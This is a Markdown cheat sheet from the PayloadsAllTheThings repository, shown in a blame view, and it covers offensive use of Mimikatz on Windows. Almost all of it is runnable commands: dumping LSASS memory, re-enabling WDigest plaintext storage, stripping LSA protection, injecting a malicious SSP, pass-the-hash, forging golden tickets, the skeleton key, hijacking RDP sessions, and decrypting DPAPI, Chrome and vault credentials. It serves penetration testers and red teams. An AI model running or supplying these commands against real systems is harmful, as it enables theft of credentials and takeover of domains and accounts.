PayloadsAllTheThings/Methodology and Resources/Windows - Mimikatz.md

318 lines
12 KiB
Markdown
Raw Normal View History

# Windows - Mimikatz
2020-01-05 16:27:02 +00:00
## Summary
2022-11-11 13:52:56 +00:00
* [Execute commands](#execute-commands)
* [Extract passwords](#extract-passwords)
* [LSA Protection Workaround](#lsa-protection-workaround)
* [Mini Dump](#mini-dump)
* [Pass The Hash](#pass-the-hash)
* [Golden ticket](#golden-ticket)
* [Skeleton key](#skeleton-key)
2023-02-11 16:49:55 +00:00
* [RDP Session Takeover](#rdp-session-takeover)
* [RDP Passwords](#rdp-passwords)
2022-11-11 13:52:56 +00:00
* [Credential Manager & DPAPI](#credential-manager--dpapi)
2021-03-25 17:25:02 +00:00
* [Chrome Cookies & Credential](#chrome-cookies--credential)
* [Task Scheduled credentials](#task-scheduled-credentials)
* [Vault](#vault)
2022-11-11 13:52:56 +00:00
* [Commands list](#commands-list)
* [Powershell version](#powershell-version)
2020-01-05 16:27:02 +00:00
* [References](#references)
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
2022-11-11 13:52:56 +00:00
## Execute commands
2018-08-12 21:30:22 +00:00
Only one command
2018-08-12 21:30:22 +00:00
2018-08-13 10:01:13 +00:00
```powershell
PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
```
Mimikatz console (multiple commands)
2018-08-12 21:30:22 +00:00
2018-08-13 10:01:13 +00:00
```powershell
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
2021-08-10 21:00:19 +00:00
mimikatz # log
mimikatz # sekurlsa::logonpasswords
2018-04-15 14:02:27 +00:00
mimikatz # sekurlsa::wdigest
2018-08-13 10:01:13 +00:00
```
2022-11-11 13:52:56 +00:00
## Extract passwords
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
2018-08-13 10:01:13 +00:00
```powershell
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
2019-10-20 11:25:06 +00:00
# to re-enable wdigest in Windows Server 2012+
# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
```
:warning: To take effect, conditions are required :
- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
* Adding requires lock
* Removing requires signout
- Win10:
* Adding requires signout
* Removing requires signout
- Win2016:
* Adding requires lock
* Removing requires reboot
2022-11-11 13:52:56 +00:00
## LSA Protection Workaround
2020-12-02 17:43:13 +00:00
2021-05-06 16:26:00 +00:00
- LSA as a Protected Process (RunAsPPL)
2020-12-02 17:43:13 +00:00
```powershell
# Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
# Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
2021-02-17 11:21:16 +00:00
# Now lets import the mimidriver.sys to the system
2020-12-02 17:43:13 +00:00
mimikatz # !+
# Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
# Finally run the logonpasswords function to dump lsass
mimikatz # privilege::debug
mimikatz # token::elevate
2020-12-02 17:43:13 +00:00
mimikatz # sekurlsa::logonpasswords
# Now lets re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
2021-05-06 16:26:00 +00:00
2021-02-17 11:21:16 +00:00
# Unload the service created
mimikatz # !-
2021-05-06 16:26:00 +00:00
# https://github.com/itm4n/PPLdump
PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>
PPLdump.exe lsass.exe lsass.dmp
PPLdump.exe -v 720 out.dmp
2020-12-02 17:43:13 +00:00
```
2020-12-17 07:56:58 +00:00
- LSA is running as virtualized process (LSAISO) by **Credential Guard**
2020-12-02 17:43:13 +00:00
```powershell
# Check if a process called lsaiso.exe exists on the running processes
tasklist |findstr lsaiso
2020-12-17 07:56:58 +00:00
# Lets inject our own malicious Security Support Provider into memory
# require mimilib.dll in the same folder
2020-12-02 17:43:13 +00:00
mimikatz # misc::memssp
# Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
```
2022-11-11 13:52:56 +00:00
## Mini Dump
2020-09-18 19:21:55 +00:00
Dump the lsass process with `procdump`
> Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.
```powershell
2020-09-18 19:21:55 +00:00
# HTTP method - using the default way
certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
2020-09-18 19:21:55 +00:00
# SMB method - using the pid
net use Z: https://live.sysinternals.com
2020-09-18 19:21:55 +00:00
tasklist /fi "imagename eq lsass.exe" # Find lsass's pid
Z:\procdump.exe -accepteula -ma $lsass_pid lsass.dmp
```
2020-09-18 19:21:55 +00:00
Dump the lsass process with `rundll32`
```powershell
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full
```
2022-11-11 13:52:56 +00:00
Use the minidump:
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords
```
* Pypykatz: `pypykatz lsa minidump lsass.dmp`
2020-09-18 19:21:55 +00:00
2022-11-11 13:52:56 +00:00
## Pass The Hash
```powershell
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
```
2022-11-11 13:52:56 +00:00
## Golden ticket
2018-08-12 21:30:22 +00:00
```powershell
2018-08-13 10:01:13 +00:00
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
```
2018-08-13 10:01:13 +00:00
```powershell
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```
2022-11-11 13:52:56 +00:00
## Skeleton key
2018-08-12 21:30:22 +00:00
```powershell
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
2023-02-11 16:49:55 +00:00
## RDP Session Takeover
2019-11-26 22:39:14 +00:00
2020-05-10 14:17:10 +00:00
Use `ts::multirdp` to patch the RDP service to allow more than two users.
2022-11-11 13:52:56 +00:00
* Enable privileges
```powershell
privilege::debug
token::elevate
```
* List RDP sessions
```powershell
ts::sessions
```
* Hijack session
```powershell
ts::remote /id:2
```
2019-11-26 22:39:14 +00:00
2022-11-11 13:52:56 +00:00
Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
2019-11-26 22:39:14 +00:00
```powershell
# get the Session ID you want to hijack
query user
create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack
```
2023-02-11 16:49:55 +00:00
## RDP Passwords
Verify if the service is running:
```ps1
sc queryex termservice
tasklist /M:rdpcorets.dll
netstat -nob | Select-String TermService -Context 1
```
* Extract passwords manually
```ps1
procdump64.exe -ma 988 -accepteula C:\svchost.dmp
strings -el svchost* | grep Password123 -C3
```
* Extract passwords using Mimikatz
```ps1
privilege::debug
ts::logonpasswords
```
2020-01-05 16:27:02 +00:00
2022-11-11 13:52:56 +00:00
## Credential Manager & DPAPI
2020-01-05 16:27:02 +00:00
```powershell
# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
# check the file with mimikatz
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
# find master key
$ mimikatz !sekurlsa::dpapi
# use master key
$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
```
2021-03-25 17:25:02 +00:00
### Chrome Cookies & Credential
```powershell
# Saved Cookies
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b
# Saved Credential in Chrome
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
```
2021-01-13 09:22:59 +00:00
### Task Scheduled credentials
2020-05-10 14:17:10 +00:00
```powershell
mimikatz(commandline) # vault::cred /patch
TargetName : Domain:batch=TaskScheduler:Task:{CF3ABC3E-4B17-ABCD-0003-A1BA192CDD0B} / <NULL>
UserName : DOMAIN\user
Comment : <NULL>
Type : 2 - domain_password
Persist : 2 - local_machine
Flags : 00004004
Credential : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Attributes : 0
```
2021-01-13 09:22:59 +00:00
### Vault
```powershell
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
```
2022-11-11 13:52:56 +00:00
## Commands list
2018-08-12 21:30:22 +00:00
| Command |Definition|
|:----------------:|:---------------|
| CRYPTO::Certificates|list/export certificates|
|CRYPTO::Certificates | list/export certificates|
|KERBEROS::Golden | create golden/silver/trust tickets|
|KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current users tickets.Similar to functionality of “klist”.|
|KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).|
|LSADUMP::DCSync | ask a DC to synchronize an object (get password data for account). No need to run code on DC.|
|LSADUMP::LSA | Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”|
|LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.|
|LSADUMP::Trust | Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).|
|MISC::AddSid | Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.|
|MISC::MemSSP | Inject a malicious Windows SSP to log locally authenticated credentials.|
|MISC::Skeleton | Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.|
|PRIVILEGE::Debug | get debug rights (this or Local System rights is required for many Mimikatz commands).|
|SEKURLSA::Ekeys | list Kerberos encryption keys|
|SEKURLSA::Kerberos | List Kerberos credentials for all authenticated users (including services and computer account)|
|SEKURLSA::Krbtgt | get Domain Kerberos service account (KRBTGT)password data|
|SEKURLSA::LogonPasswords | lists all available provider credentials. This usually shows recently logged on user and computer credentials.|
|SEKURLSA::Pth | Pass- theHash and Over-Pass-the-Hash|
|SEKURLSA::Tickets | Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computers AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).|
|TOKEN::List | list all tokens of the system|
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
2022-11-11 13:52:56 +00:00
## Powershell version
2018-08-12 21:30:22 +00:00
Mimikatz in memory (no binary on disk) with :
2018-08-12 21:30:22 +00:00
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
- [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
More information can be grabbed from the Memory with :
2018-08-12 21:30:22 +00:00
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
2019-10-20 11:25:06 +00:00
- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
2023-02-11 16:49:55 +00:00
- [Dumping RDP Credentials - MAY 24, 2021](https://pentestlab.blog/2021/05/24/dumping-rdp-credentials/)